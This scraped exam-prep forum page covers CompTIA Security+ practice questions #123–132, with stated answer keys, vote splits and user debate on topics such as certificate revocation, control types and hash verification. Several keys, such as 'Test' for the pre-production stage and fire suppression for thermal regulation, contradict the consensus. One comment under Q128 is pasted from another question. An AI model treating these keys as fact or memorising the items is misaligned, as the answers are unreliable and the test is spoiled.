upvoted 4 times

Question #123 Topic 1

An application developer accidentally uploaded a company's code-signing certificate private key to a public web server. The company is concerned
about malicious use of its certificate. Which of the following should the company do FIRST?

A. Delete the private key from the repository.

B. Verify the public key is not exposed as well.

C. Update the DLP solution to check for private keys.

D. Revoke the code-signing certificate.

Correct Answer: D

Community vote distribution


D (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: D
We need to revoke the code-signing certificate as this is the most secure way to ensure that the compromised key won't be used by attackers.
Usually there are bots crawling all over repos searching for this kind of human error.
upvoted 14 times

  DALLASCOWBOYS Most Recent  4 days, 11 hours ago


D. Revoke the code-signing certificate.
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


revoke the certificate and you should perform user training to minimize the chance for this to happen again
upvoted 2 times

  Jossie_C 3 months ago


Selected Answer: D
D is containment
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: D
This is D
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


Revoke the certificate with a revocation authority, and go about getting a new one from a certificate authority.
upvoted 2 times


Question #124 Topic 1

An organization implemented a process that compares the settings currently configured on systems against secure configuration guidelines in
order to identify any gaps. Which of the following control types has the organization implemented?

A. Compensating

B. Corrective

C. Preventive

D. Detective

Correct Answer: D

Community vote distribution


D (58%) C (41%)

  Gravoc Highly Voted  4 months, 2 weeks ago


From the official study guide:
"Compensating - controls designed to mitigate the risk associated with exceptions made to a security policy.

Corrective - remediate security issues that have already occurred. Restoring backups after a ransomware attack is an example of a corrective
control.

Preventive - intend to stop a security issue before it occurs. Firewalls and encryption are examples of preventive controls.

Detective - identify security events that have already occurred. Intrusion detection systems are detective controls."

Based on this, Preventive makes the most sense to me. They are comparing the configurations to a secure guideline to ensure no gaps. Meaning
they are pre-emptively hardening their systems against future attack vectors.
upvoted 29 times

  J_Ark1 2 months, 4 weeks ago


Stone face wisdom here :)
upvoted 3 times

  BigLao 3 months ago


They're comparing to "identify any gaps" not to ensure any gaps.

Two different things


upvoted 3 times

  jgp Highly Voted  5 months ago


Selected Answer: D
"...identify..."
upvoted 13 times

  Strykar 4 months, 1 week ago


"Identify so it can be Prevented". It better to read and understand the whole question and not just a keyword.
upvoted 7 times

  DeezusNewtus Most Recent  1 day, 11 hours ago


Selected Answer: C
The answer should be C, Preventive.

Detective Controls identify details and data associated with an INCIDENT's activities. The question doesn't list an incident, so it must be a
preventive control. Comparing configurations to identify gaps is an act of avoiding an incident from occurring, therefore preventive.

https://linfordco.com/blog/importance-of-preventive-controls/
upvoted 1 times

  constant380 3 days, 1 hour ago


Selected Answer: C
Preventive: acts before the attack can take place
Detective: by contrast, allows attacks to be detected, not vulnerabilities
upvoted 1 times

  DALLASCOWBOYS 4 days, 11 hours ago


C. Preventive controls. Nothing in the question suggests an incident has occurred; therefore, detective controls are out. They are comparing
configuration settings to prevent an incident from occurring.

upvoted 1 times

  ronniehaang 4 days, 14 hours ago

Selected Answer: D
The organization has implemented a Detective control type.

Detective controls are designed to identify and alert on security incidents or violations that have occurred. They can be implemented through
various mechanisms such as intrusion detection systems, security information and event management (SIEM) systems, and security audits. The
process of comparing the settings currently configured on systems against secure configuration guidelines identifies any gaps in security and is
thus a detective control. These controls are used to detect security incidents, security violations, or deviations from established policies and
procedures and to provide data that can be used to support a forensic investigation.
upvoted 1 times

  LasinduJ 5 days, 1 hour ago


ChatGPT says C.
upvoted 2 times

  LaoX 4 weeks, 1 day ago


Selected Answer: C
They are hardening their systems against future attack vectors. That is a preventive measure
upvoted 3 times

  jhfdkjshfkjdsho 1 month, 2 weeks ago


Selected Answer: C
Preventive. There is no attack.
upvoted 2 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
The organization has implemented a detective control. A detective control is a security control that is used to detect security incidents or policy
violations after they have occurred. In this case, the organization has implemented a process that compares the settings currently configured on
systems against secure configuration guidelines in order to identify any gaps. This is an example of a detective control, as it is designed to detect
any deviations from the organization's secure configuration standards. Detective controls are typically used in conjunction with other types of
controls, such as preventive controls, which are designed to prevent incidents from occurring, and corrective controls, which are used to correct
any issues that are detected. Compensating controls are used to address risks that cannot be mitigated by other means.
upvoted 3 times

Lv2023 1 month, 4 weeks ago
Selected Answer: C
Given the scenario and the following definitions
Preventive: the control acts to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can
take place.
Detective: the control may not prevent or deter access, but it will identify and record any attempted or successful intrusion. A detective control
operates during the progress of an attack.

Based on the definition of these two controls the question in my opinion is describing a preventive control. They are hoping to prevent an "event"
by comparing the current configuration to the so-called best practices/recommended configurations, if the exercise identifies any weak
configurations, I imagine updates will be made.
upvoted 3 times

afazaeli 2 months ago
D is wrong, detective detects attacks not vulnerabilities. C is the correct answer which is "Preventive"
upvoted 2 times

tek7ila 2 months ago
Selected Answer: C
It's C. It's a pretty simple question if you understand what every method is:

Corrective - used after an incident to remove the vulnerability

Detective - to detect any incident that is happening

Compensating - used when you know there is a vulnerability but you cannot remove it from the system (for example, some old stations that are
essential for your work but are no longer supported by Microsoft)

And last but not least PREVENTIVE, which is nothing else than HARDENING :)
upvoted 1 times

Kalender 2 months, 1 week ago
Selected Answer: C
...guidelines in order to identify any gaps...

Why are we trying to identify any gaps?

So that the event doesn't happen... so the event hasn't happened yet. So it's a preventive control.
upvoted 1 times

bengy78 2 months, 3 weeks ago
It's preventative, not detective, straight from CompTIA CertMaster: "A detective control operates during the progress of an attack."
upvoted 1 times

Sir_Learnalot 2 months, 3 weeks ago
Selected Answer: D
This is a detective control, as soon as you start to apply the findings from this comparison, this system hardening would be a preventive control
upvoted 5 times

The_F00L 3 months ago
Selected Answer: D
Remember. It's CompTIA.
"in order to IDENTIFY any gaps"
There is no "action" implied in the question. It's D. Detective
upvoted 5 times

Question #125 Topic 1

The Chief Information Security Officer directed a risk reduction in shadow IT and created a policy requiring all unsanctioned high-risk SaaS
applications to be blocked from user access. Which of the following is the BEST security solution to reduce this risk?

A. CASB

B. VPN concentrator

C. MFA

D. VPC endpoint

Correct Answer: A

Community vote distribution


A (100%)

Mamun1 Highly Voted 5 months ago
Selected Answer: A
A cloud access security broker (CASB) is on-premises or cloud-based software that sits between a cloud service consumer and a cloud service
provider. It serves as a tool for enforcing an organization's security policies through risk identification and regulation compliance whenever its
cloud-residing data is accessed.
upvoted 13 times

ScottT 4 months, 3 weeks ago
For me the key clue is SaaS, suggesting cloud computing. With that being decided, CASB is the only option.
upvoted 5 times

comeragh Highly Voted 5 months ago
Selected Answer: A
By process of elimination A seems to be the correct answer
upvoted 5 times

Gino_Slim 3 months, 1 week ago
That's exactly what I did. Even if I didn't know what CASB meant, the others didn't make any sense
upvoted 4 times

DALLASCOWBOYS Most Recent 4 days, 11 hours ago
A. SaaS is a cloud based service, therefore, a CASB, Cloud Access Security Broker
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: A
The best security solution to reduce the risk of shadow IT and unsanctioned high-risk SaaS applications is a Cloud Access Security Broker
(CASB). A CASB is a security solution that is designed to provide visibility and control over cloud applications and services. It can be used to
block access to unsanctioned applications and to enforce security policies and compliance requirements for cloud services. In this case, the
CASB would be used to block access to unsanctioned high-risk SaaS applications, reducing the risk of shadow IT and helping the organization
to maintain control over its cloud environment. Options B, C, and D are not specifically related to reducing the risk of shadow IT and
unsanctioned SaaS applications. A VPN concentrator is a network device that is used to manage and terminate VPN connections, MFA is a
security control that requires multiple factors for authentication, and a VPC endpoint is a networking feature that allows private access to AWS
services.
upvoted 1 times

Question #126 Topic 1

A technician enables full disk encryption on a laptop that will be taken on a business trip. Which of the following does this process BEST protect?

A. Data in transit

B. Data in processing

C. Data at rest

D. Data tokenization

Correct Answer: C

Community vote distribution


C (100%)

DALLASCOWBOYS 4 days, 11 hours ago
C. Data at rest, such as data stored on the device when it is in an off state, or when a laptop is in sleep mode.
upvoted 1 times

xxxdolorxxx 2 weeks, 1 day ago
C is the right answer. They tried to throw a curveball with the "traveling" thing, lol.
upvoted 2 times

kstevens11 2 months, 4 weeks ago
Selected Answer: C
Full DISK encryption - disk data is data at rest
upvoted 3 times

Gravoc 4 months, 2 weeks ago
Data in transit is incorrect. The official terminology is data in motion.

Data-in-Motion: Data that is in transit over a network. Think data packets working their way across the internet.

Data-at-Rest: Stored data that resides on hard drives, tapes, in the cloud, or on other storage media. When this is taught, it's almost always
taught as a USB stick laying on a desk in an office. Don't forget that this is a broad category.

Data-in-Processing: Data that is actively in use by a computer system. Includes data stored in memory while processing takes place.
upvoted 4 times

serginljr 4 months, 3 weeks ago
Selected Answer: C
Data at Rest is correct Answer.

Data at rest: Data at rest is data in its stored or resting state, which is
typically on some type of persistent storage such as a hard drive or tape.
Symmetric encryption is used in this case.
upvoted 4 times

Question #127 Topic 1

A security analyst was called to investigate a file received directly from a hardware manufacturer. The analyst is trying to determine whether the
file was modified in transit before installation on the user's computer. Which of the following can be used to safely assess the file?

A. Check the hash of the installation file.

B. Match the file names.

C. Verify the URL download location.

D. Verify the code signing certificate.

Correct Answer: A

Community vote distribution


A (72%) D (28%)

Gravoc Highly Voted 4 months, 2 weeks ago
The hardware manufacturer will post the hash of the file publicly, and anyone who receives a copy of that file will be able to run a checksum on
the file themselves, and compare them to the official manufacturer-provided checksum. Hashing is almost always the correct answer in these
type of questions. You'll see a lot of Github repositories using hashed checksums as well for verification, and I recently just installed Java onto
my new computer. Java provided me with a hashed checksum for the setup executable.
upvoted 11 times

DALLASCOWBOYS Most Recent 4 days, 11 hours ago
A. Check the hash of the file to verify the integrity of the file to see if it was modified.
upvoted 1 times

Blake89 1 week, 4 days ago
Selected Answer: A
Directly from the CompTIA Sec + Study Guide: "• The most common way to validate that a forensic copy matched an original copy is to create a
hash of the copy and to create a hash of the original drive, and then compare them. If the hashes match, the forensic copy is identical to the
original."
upvoted 2 times

sanlibo 2 weeks, 1 day ago
Selected Answer: A
Hashing
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: A
The security analyst can safely assess the file by checking the hash of the installation file. A hash is a unique value that is generated based on the
contents of a file. When a file is sent from one party to another, the sender can compute the hash of the file and provide it to the recipient. The
recipient can then compute the hash of the received file and compare it to the original hash. If the hashes match, it indicates that the file has not
been modified and is identical to the original file. This can provide assurance that the file has not been tampered with or corrupted in transit.
Options B, C, and D are not reliable methods for determining whether a file has been modified in transit. Matching file names does not guarantee
the integrity of the file, verifying the URL download location does not provide information about the file itself, and verifying the code signing
certificate does not guarantee that the file has not been modified.
upvoted 1 times
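Worked example of the hash check described in the answers above, added here and not part of the original thread: it streams SHA-256 over the downloaded file, parses a vendor-style SHA256SUMS manifest, and compares the digests in constant time. The file names, installer bytes and manifest are constructed stand-ins, not any real vendor's values.

```python
"""Verify a downloaded installer against a vendor-published SHA256SUMS manifest.

Added example (not from the thread). The installer bytes, file names and
manifest below are constructed stand-ins for a real vendor download.
"""
import hashlib
import hmac
import os
import tempfile


def sha256_of_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hash the file in chunks so a multi-GB installer never has to fit in RAM."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def parse_checksum_manifest(text: str) -> dict:
    """Parse sha256sum output: '<hex digest>  <name>' or '<hex digest> *<name>'."""
    expected = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"malformed manifest line: {raw!r}")
        digest, name = parts[0].lower(), parts[1].lstrip("*").strip()
        if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError(f"not a SHA-256 digest: {parts[0]!r}")
        expected[name] = digest
    return expected


def verify_download(path: str, manifest_text: str) -> bool:
    """Return True only if the file's SHA-256 matches the manifest entry for its name.

    A match proves integrity, not origin: the manifest itself must come from a
    channel you trust (the vendor's HTTPS site, or a signed manifest), otherwise
    whoever could swap the file could swap the published hash alongside it.
    """
    expected = parse_checksum_manifest(manifest_text)
    name = os.path.basename(path)
    if name not in expected:
        raise KeyError(f"{name} is not listed in the manifest")
    actual = sha256_of_file(path)
    # compare_digest avoids leaking how many leading characters matched.
    return hmac.compare_digest(actual, expected[name])


def demo() -> dict:
    """Constructed scenario: the genuine installer, then a copy altered in transit."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        genuine = os.path.join(tmp, "firmware-tool.bin")
        with open(genuine, "wb") as fh:
            fh.write(b"abc")  # stand-in for the real installer contents
        # The manifest the vendor would publish next to the download.
        manifest = f"{sha256_of_file(genuine)}  firmware-tool.bin\n"
        results["intact"] = verify_download(genuine, manifest)

        altered_dir = os.path.join(tmp, "altered")
        os.mkdir(altered_dir)
        altered = os.path.join(altered_dir, "firmware-tool.bin")
        with open(altered, "wb") as fh:
            fh.write(b"abd")  # one byte changed in transit; same file name
        results["altered"] = verify_download(altered, manifest)

        try:
            verify_download(os.path.join(tmp, "not-listed.bin"), manifest)
        except KeyError:
            results["unlisted"] = "rejected"
    return results


if __name__ == "__main__":
    print(demo())  # {'intact': True, 'altered': False, 'unlisted': 'rejected'}
```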

tek7ila 2 months ago
Selected Answer: A
A. Always when it's about checking if an app wasn't modified by a 3rd party - you compare hashes :p
upvoted 2 times

kstevens11 2 months, 4 weeks ago
Selected Answer: A
keywords: "determine whether a file was modified", and you need a hash comparison for this. Code signing is more for nonrepudiation, I thought.
upvoted 2 times

MathDayMan 3 months, 1 week ago
A
Hashed is the right one
upvoted 1 times

G4ct756 3 months, 2 weeks ago
Selected Answer: D
D. There is a possibility of hash collision, and we can't verify whether the file is from the manufacturer.
A code signing certificate verifies the file is not tampered with, together with the signer's identity.
I would think a code signing certificate will hold more weight over a file hash.
upvoted 3 times
Tomtom11 3 months, 3 weeks ago
Selected Answer: A
File is Hashed
Code is Signed to ensure it has not been altered
upvoted 2 times

abrilo 3 months, 3 weeks ago
Another use of digital certificates is when we are distributing software. A developer will create an executable or a piece of software
that needs to be distributed, and then they will sign that software with a code signing certificate. This means that we can receive that software
and install it and during the installation process, we can validate that the program that we’re installing is exactly the same executable as the one
that was distributed by the manufacturer.
upvoted 1 times

RonWonkers 4 months, 2 weeks ago
Selected Answer: A
I can see why D could work but I'm still going with A, since A is almost always the answer to these sort of questions and it is what I always hear,
check the hash/checksum
upvoted 3 times

gennyyy 4 months, 2 weeks ago
Selected Answer: D
Should be D
upvoted 2 times

andrizo 3 months, 3 weeks ago
certs are more for non-repudiation though
upvoted 2 times

kstevens11 2 months, 4 weeks ago
agreed
upvoted 1 times

Question #128 Topic 1

A help desk technician receives a phone call from someone claiming to be a part of the organization's cybersecurity incident response team. The
caller asks the technician to verify the network's internal firewall IP Address. Which of the following is the technician's BEST course of action?

A. Direct the caller to stop by the help desk in person and hang up declining any further requests from the caller.

B. Ask for the caller's name, verify the person's identity in the email directory, and provide the requested information over the phone.

C. Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the
organization's cybersecurity officer.

D. Request the caller send an email for identity verification and provide the requested information via email to the caller.

Correct Answer: D

Community vote distribution


C (71%) D (29%)

stoneface Highly Voted 5 months ago
Selected Answer: D
D->Request the caller send an email for identity verification and provide the requested information via email to the caller. -> This will allow us to have
a record of the requested information as well as identifying the requester.
upvoted 9 times

J_Ark1 2 months, 4 weeks ago
For the SIEM systems to be able to know who it was that attacked and compromised the system?
upvoted 1 times

J_Ark1 2 months, 4 weeks ago
The issue is that a random individual is trying to gain access to the internal network and hence we do not know their intended purpose, so it
makes sense to notify the cyber security officer so that they can confirm their authorisation via the right channels of communication.
upvoted 2 times

varun0 5 months ago
Emails can easily be spoofed, C seems to be the best option.
upvoted 6 times

VendorPTS 4 months ago
Also, as it didn't say the email was encrypted, the email is potentially subject to monitoring/analysis, and you don't really want to put that
out there without securing it. C seems best with these choices.
upvoted 3 times

rodwave Highly Voted 2 months, 3 weeks ago
Selected Answer: C
Answer: Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the
organization's cybersecurity officer.

In this scenario, the help desk technician should be wary of the person's request as help desk technicians would not have this information. Also,
if the person claimed to be from the cybersecurity incident response team, they would more likely have access to this information anyway, or
at least know who to contact.

For the sake of the technician, it would be best to get as much information as possible and delegate the task of confirming the person's identity
to the cybersecurity officer. Even in the very slim chance that it was a legitimate request, it would still be best for the cyber security officer to
provide this information instead of a tech.
upvoted 5 times

xxxdolorxxx Most Recent 2 days, 16 hours ago
So I read this a few times and maybe it's just me but the second half of D is throwing some red flags for me. "and provide the requested
information via email to the caller." this implies that the company would then send the documents to the caller. Wouldn't that be a potential
security risk? Originally I thought D. Now I feel like D is wrong.
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: D
A benefit of including a risk management framework into an organization's security approach is that it incorporates control, development, policy,
and management activities into IT operations. A risk management framework is a structured approach to identifying, assessing, and mitigating
risks to the organization's assets, operations, and reputation. By incorporating a risk management framework into the organization's security
approach, the organization can ensure that control, development, policy, and management activities are integrated into its IT operations, and that
appropriate measures are taken to address potential risks. This can help to improve the overall security posture of the organization and to reduce
the likelihood and impact of security incidents. Options A, B, and C are not benefits of incorporating a risk management framework into an
organization's security approach. A risk management framework does not necessarily define expected service levels from supply chain partners,
identify specific vendor products, or provide legal assurances and remedies in the event of a data breach.
upvoted 1 times
FMMIR 1 month, 3 weeks ago
Selected Answer: D
I am with Stoneface.

The technician's best course of action is to request the caller send an email for identity verification and provide the requested information via
email to the caller. In this situation, it is important for the technician to verify the identity of the caller before providing any sensitive information.
The caller could be a malicious actor attempting to gain unauthorized access to the organization's network, and providing the requested
information over the phone could be a security risk. By requesting that the caller send an email for identity verification, the technician can ensure
that the person on the other end of the line is who they claim to be, and that the request is legitimate. The technician can then provide the
requested information via email, which is a more secure method of communication than over the phone. Options A, B, and C are not appropriate
in this situation, as they do not provide adequate safeguards for verifying the identity of the caller.
upvoted 1 times

deeden 2 months ago
Selected Answer: C
This one is tricky. Not sure why a CSIRT member would be asking Helpdesk for the Firewall IP instead of the Network Administrator. Maybe C
would be a better choice given the scenario? I'm sure the Helpdesk will call CSIRT back if found legitimate :)
upvoted 2 times

deeden 2 months ago
Call back using the work number found on the corporate directory, that sounds safer to me. Backed up by an email request and a relevant incident
ticket number, just to be sure.
upvoted 1 times

redx04 2 months, 1 week ago
C makes more sense at work .
upvoted 1 times

J_Ark1 2 months, 4 weeks ago
Selected Answer: C
It is C because it's simply a random individual seeking to try and bypass other security requirements, so it makes sense to delegate the issue to the
cyber security officer so as to confirm that they are authorised to attain the information and prevent any malicious actor from gaining access to
the internal network. It's not D as the question does not contain enough info to support D as the answer (forgive my spelling: I've got dyslexia)
upvoted 4 times

lordguck 3 months, 1 week ago
A and keep a baseball bat handy ;-)
upvoted 4 times

Libraboy 3 months, 2 weeks ago
why not A?
upvoted 3 times

Strykar 4 months, 1 week ago
Selected Answer: C
Not D - The helpdesk tech is not supposed to provide this information. Also the email can be spoofed.
upvoted 5 times

Jakalan7 4 months, 2 weeks ago
Another subjective question, the answer could easily be C or D.
upvoted 1 times

RonWonkers 4 months, 2 weeks ago
Selected Answer: C
It is C, D is in no way safe and cannot be considered proof
upvoted 3 times

Gravoc 4 months, 2 weeks ago
It's C. Helpdesk isn't authorized to do basically anything. Helpdesk should be seen as basic troubleshooting, and then escalating to the
appropriate party when it goes beyond that. If Helpdesk can't find the answer on Google, then it's time to escalate. Can Helpdesk find the
company's internal firewall IP on Google? No? Then escalate.
upvoted 4 times

Gino_Slim 3 months, 1 week ago
All this should let everyone know....do NOT get trapped in Helpdesk. You will get nowhere in life.
upvoted 5 times

Yuyuyakuza 4 months, 3 weeks ago
C. Considering a help desk technician doesn't have the ability/authority to pass out internal IPs, you should escalate that to tier 2 networking. The best
answer: just take the info, play it safe, and pass the information on to the
cyber security team.
upvoted 1 times
comeragh 4 months, 4 weeks ago
On further review I think C sits best as the answer here
upvoted 2 times

Liftedkris 5 months ago
Selected Answer: C
I would go with C here. D was the other option I considered carefully, however even emails are not completely safe as they could be spoofed
upvoted 3 times

Question #129 Topic 1

Which of the following would BEST provide detective and corrective controls for thermal regulation?

A. A smoke detector

B. A fire alarm

C. An HVAC system

D. A fire suppression system

E. Guards

Correct Answer: D

Community vote distribution


C (78%) D (22%)

stoneface Highly Voted 5 months, 1 week ago
Selected Answer: C
What are the functions of an HVAC system?

An HVAC system is designed to control the environment in which it works. It achieves this by controlling the temperature (THERMAL) of a room
through heating and cooling. It also controls the humidity level in that environment by controlling the movement and distribution of air inside the
room. So it provides detective and corrective controls for THERMAL regulation.
upvoted 17 times

Blake89 Most Recent 1 week, 4 days ago
Selected Answer: C
CompTIA Study Guide book: "HVAC systems ensures that the processes or systems are at the proper temperature and humidity."
upvoted 1 times

Boubou480 4 weeks ago
Selected Answer: C
C. An HVAC system would provide the best detective and corrective controls for thermal regulation. An HVAC (heating, ventilation, and air
conditioning) system can detect deviations in temperature and adjust accordingly to maintain a comfortable and safe range. It can also alert
maintenance staff if there is a problem that needs to be corrected.
upvoted 1 times

jhfdkjshfkjdsho 1 month, 2 weeks ago
Selected Answer: D
A fire suppression system, like a fire sprinkler system, is used to extinguish or control fires, and is activated by heat, smoke, or a combination of
the two. However, a fire suppression system uses gaseous, chemical, or foam fire suppression agents to suppress the fire, rather than water. So,
it is a detective and corrective system
upvoted 1 times

Blake89 1 week, 4 days ago
Lol just stop it. The answer is C
upvoted 1 times

PraygeForPass 3 weeks, 1 day ago
Thermal regulation isn't just fires/smoke. It can be extremely cold or humid in a building for example. A fire suppression system won't help
with that.
upvoted 2 times

nul8212 1 month, 2 weeks ago
Selected Answer: D
This answer covers both parts of the question.
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: C
An HVAC system would provide the best detective and corrective controls for thermal regulation. An HVAC (heating, ventilation, and air
conditioning) system is a type of building management system that is used to control the temperature, humidity, and air quality within a building.
HVAC systems typically include sensors that can detect changes in temperature, and control mechanisms that can adjust the heating or cooling
output to maintain a comfortable and safe environment. This provides both detective and corrective controls for thermal regulation, as the
sensors can detect deviations from the desired temperature range, and the control mechanisms can automatically adjust the heating or cooling
output to correct the problem. Options A, B, D, and E do not provide the same level of control for thermal regulation as an HVAC system. A
smoke detector and fire alarm can detect fires, but they do not provide the same level of control over the temperature within a building. A fire
suppression system can extinguish fires, but it does not provide any control over the temperature. Guards do not provide any control over the
temperature.
upvoted 1 times
babyzilla 2 months, 3 weeks ago
Selected Answer: C
Remember corrective and detective are AFTER an incident occurs. The fire suppression system would kick in after a fire happened...I highly
doubt that this is what the question is referring to. On the other hand, in order for a HVAC system to activate, a simple thermal change has to
happen. Just like at home, you set your thermostat to heat or cool and set a temp. If it goes below or above your set temp, then the system will
kick on.
upvoted 1 times

The_F00L 3 months ago
It's HVAC, but man... gotta love fire suppression as an answer. Got a giggle out of me.
upvoted 1 times

Oval61251 3 months, 1 week ago
Where do the "correct" answers come from? I believe the answer is C but apparently the "correct" one is D? Which one is correct based off
CompTIA?
upvoted 1 times

sm0k3 3 months, 2 weeks ago
Keyword… REGULATE.: control or maintain the rate or speed of (a machine or process) so that it operates properly. Answer is HVAC.
upvoted 1 times

andrizo 3 months, 3 weeks ago
Just kinda throwing it out there, isn't a HVAC system more preventive than corrective?
upvoted 2 times

ergo54 3 months, 4 weeks ago
Selected Answer: D
Once again, going back to the Darril Gibson study guide here. Nowhere in the study guide is HVAC discussed (that I can find), but fire
suppression system is:
"A fixed [fire suppression] system can detect a fire and automatically activate it to extinguish the fire."
upvoted 4 times

RonWonkers 4 months, 2 weeks ago
Selected Answer: C
Should be C
upvoted 2 times

Gravoc 4 months, 2 weeks ago
HVAC all the way.
upvoted 1 times

Fitzd 4 months, 2 weeks ago
It has to be HVAC; a fire suppression system has built-in components that detect fires at the beginning stages through heat, smoke, and other
warning signals.
upvoted 1 times

k9_462 4 months, 3 weeks ago
Selected Answer: C
Thermal regulation, AKA a thermostat. It's HVAC.
upvoted 1 times

ksave 4 months, 3 weeks ago
Selected Answer: C
Detects the fire and recovers it from fire.
I am going with answer C.
upvoted 1 times

ksave 4 months, 3 weeks ago
I meant answer D :)
upvoted 1 times

Question #130 Topic 1

Which of the following is a benefit of including a risk management framework into an organization's security approach?

A. It defines expected service levels from participating supply chain partners to ensure system outages are remediated in a timely manner.

B. It identifies specific vendor products that have been tested and approved for use in a secure environment.

C. It provides legal assurances and remedies in the event a data breach occurs.

D. It incorporates control, development, policy, and management activities into IT operations.

Correct Answer: D

Community vote distribution


D (78%) C (22%)

tek7ila 1 month, 4 weeks ago
Selected Answer: D
I would go with D. There is nothing about legal assurance in the books I read.

Risk management is about identifying vulnerabilities and threats in your company, to help you mitigate them so your company can run
smoothly.
upvoted 2 times

deeden 2 months ago
Selected Answer: C
Agree with C. RMF goes beyond IT Operations and Supplier/Vendor management.
upvoted 1 times

passmemo 3 months, 3 weeks ago
Selected Answer: D
An effective risk management framework will prioritize understanding the risks that your business faces to take the necessary steps to protect
your assets and your business
upvoted 2 times

skorza 4 months ago
Is it not A as the benefit is "to ensure system outages are remediated in a timely manner"?
upvoted 2 times

studant_devsecops 4 months, 1 week ago
Selected Answer: C
Believe the keyword is the reference to legal. Does anyone think the same?
upvoted 1 times

[Removed] 4 months, 1 week ago
Where is it referencing "legal"?
upvoted 2 times

Gino_Slim 3 months, 1 week ago
It doesn't. Idk where they got that from.
upvoted 2 times

RonWonkers 4 months, 2 weeks ago
Selected Answer: D
I agree with D
upvoted 3 times

Question #131 Topic 1

An organization maintains several environments in which patches are developed and tested before being deployed to an operational status. Which
of the following is the environment in which patches will be deployed just prior to being put into an operational status?

A. Development

B. Test

C. Production

D. Staging

Correct Answer: B

Community vote distribution


D (95%) 5%

KetReeb Highly Voted 5 months ago
Answer D: The staging environment is an optional environment, but it is commonly used when an organization has multiple production
environments. After passing testing, the system moves into staging, from where it can be deployed to the different production systems.
upvoted 9 times

Samsonite363 Most Recent 3 days, 15 hours ago
Selected Answer: D
Development > Testing > Staging > Production
upvoted 1 times

Comicbookman 2 weeks ago
A staging environment is the last step before something goes into production and is visible on the live site.

A staging site’s main purpose is to ensure that all new changes deployed from previous environments are working as intended before they hit the
live website. By using a staging site and testing everything before deploying to a live website, you will be able to eliminate bugs and issues, so
they never affect the user. Sometimes this process is referred to as quality assessment (QA).
upvoted 1 times

Boubou480 4 weeks ago
Selected Answer: D
D. Staging

The staging environment is where patches are deployed just prior to being put into an operational status. It is a test environment that closely
resembles the production environment, and it is used to ensure that patches are working correctly before they are deployed to the production
environment.

The development environment is where new patches are developed and tested before they are ready to be deployed to a test environment. The
test environment is where patches are tested to ensure that they are working correctly before they are deployed to the staging environment. The
production environment is the live operational environment where patches are deployed once they have been tested and approved.
upvoted 1 times

Capt_Mundo 1 month, 1 week ago
Selected Answer: C
I think it's C as it is stated in the question "Which of the following is the environment in which patches will be deployed"; the patches are being
deployed during TESTING, however in STAGING patches have already been deployed and tested, it's for observation whether deployment to
Production is feasible.
upvoted 1 times

Capt_Mundo 1 month, 1 week ago
I stand corrected B is my answer due to the reasons above. thanks
upvoted 1 times

rodwave 2 months, 3 weeks ago
Selected Answer: D
Answer: Staging

Staging is a testing environment similar to production where the software system will go through final testing to ensure the application will work
properly when it's deployed to production
====================
Software Development Environment Stages:
1. Development - Where the actual development of the software takes place (source code/machine code)
2. Testing - The testing environment is where new or updated code functionalities from development is tested. The primary focus is components
of the software vs the entire application.
3. Staging - After passing tests, the software system moves to the staging environment which is identical to production where the system will go
through final testing to ensure the application will work properly when it's deployed to production
4. Production - This is the live environment that is available to users
upvoted 3 times
RonWonkers 4 months, 2 weeks ago
Selected Answer: D
It's D, kind of weird to give away 3 out of 4 steps in the question itself, leaving Stage as the only option :P.
upvoted 2 times

Liftedkris 4 months, 4 weeks ago
Selected Answer: D
For sure!
upvoted 4 times

comeragh 5 months ago
Selected Answer: D
D - staging. I agree with operation status referring to production.
development/testing/staging/production (in this order)
upvoted 4 times

kingsAffection 5 months ago
Selected Answer: D
D is the answer, key phrase - "prior to being put into an operational status?", operational status or "production" and it will always be the staging
before production.
upvoted 3 times

DUCKDOG 5 months ago
Selected Answer: D
Should be D.
upvoted 2 times

stoneface 5 months, 1 week ago
Not sure about this one.

A development environment does match with the description that patches are developed and tested, and that is usually on a local machine, a.k.a.
a dev environment.

In a test environment code from multiple developers is merged to a single master copy and subjected to basic unit and functional tests (either
automated or by human testers) and to integration and regression tests.

Can we consider that a development env is in an operational status, since usually developers will have a local copy?
upvoted 2 times

Sandon 2 months, 2 weeks ago
I expected better from you Stoneface.
upvoted 1 times

Bimtos 2 weeks, 5 days ago
oh mine! He isn't perfect, you can't expect him to always get it right.
Everyone has got areas of strengths and weaknesses. This isn't his strength this time.
upvoted 1 times

Gravoc 4 months, 2 weeks ago
Ignore the first sentence of the question. Only read the second sentence. It's asking which phase comes just BEFORE production. Staging is
the correct answer.
upvoted 2 times

Question #132 Topic 1

During a trial, a judge determined evidence gathered from a hard drive was not admissible. Which of the following BEST explains this reasoning?

A. The forensic investigator forgot to run a checksum on the disk image after creation.

B. The chain of custody form did not note time zone offsets between transportation regions.

C. The computer was turned off, and a RAM image could not be taken at the same time.

D. The hard drive was not properly kept in an antistatic bag when it was moved.

Correct Answer: B

Community vote distribution


B (60%) A (40%)

Dachosenone Highly Voted 5 months ago
Selected Answer: B
The question states that a trial Judge determined evidence gathered from a hard drive was not admissible. It is obvious that this is a legal matter.
All of the remaining answers are of a technical nature, So consequently the only issue that a Judge can rule on is a Chain of custody issue. So,
ladies and gentlemen, I rest my case (quickly bangs a gavel upon the desk)
upvoted 13 times

kstevens11 2 months, 4 weeks ago
great point with 3 of the answers being technical in nature
upvoted 1 times

enginne 4 months, 4 weeks ago
